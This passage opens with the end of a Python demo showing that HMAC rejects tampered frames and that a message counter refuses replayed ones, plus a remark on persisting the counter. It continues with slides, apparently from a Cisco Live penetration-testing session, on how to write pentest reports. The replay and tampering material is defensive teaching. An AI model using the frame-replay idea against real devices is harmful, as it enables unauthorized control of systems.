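    # HMAC: the same change without the key leaves a tag that no longer verifies.
    results["mac_accepts_modified"] = mac_ok(key, alter_payload(legit_mac, TAG_LEN, b"state=1", False))
    # Counter: a valid frame is accepted once and refused when delivered again.
    results["first_delivery"] = rx.accept(legit_mac)
    results["replay"] = rx.accept(legit_mac)
    results["next_frame"] = rx.accept(mac_frame(key, 2, b"state=0"))
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:22} {value}")
```

The counter also has to survive the receiver rebooting, otherwise `last_counter` resets and every previously captured frame becomes fresh again; persisting it (or using a challenge-response nonce) is what separates a demo from a deployable design.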

154 Reporting – Language is Everything

• People can be terminated
• Critical vulnerabilities could be overlooked
• Money and time could be wasted
• Choose your tone wisely
• Expect various education types to read it
• Include details (tools, time, process)
• Define acronyms

156 Penetration Testing Report

• Target audience – Who will read it
• Report classification – Could contain sensitive information
• All information collected – Need to list everything (notes, screenshots, etc.)
• Summary of findings
• Summary of recommendations

157 Penetration Testing Report – Details

• Vulnerabilities – What you found
• Impact – Potential damage
• Likelihood – How hard to execute
• Risk evaluation – Impact to business
• Recommendation – Remediation steps
• References – Who worked on what
• Additional details – Appendices, glossary, tools used, etc.

Example: Offensive Security sample report, https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf

158 Wrap up

159 Threats will increase. Volume and sophistication.

160 Next Steps

161 Complete your online session evaluation

Give us your feedback to be entered into a Daily Survey Drawing. Complete your session surveys through the Cisco Live mobile app or on www.CiscoLive.com/us.

Don’t forget: Cisco Live sessions will be available for viewing on demand after the event at www.CiscoLive.com/Online.

162 Continue your education: Demos in the Cisco campus, Walk-in self-paced labs, Meet the engineer 1:1 meetings, Related sessions

163 Thank you
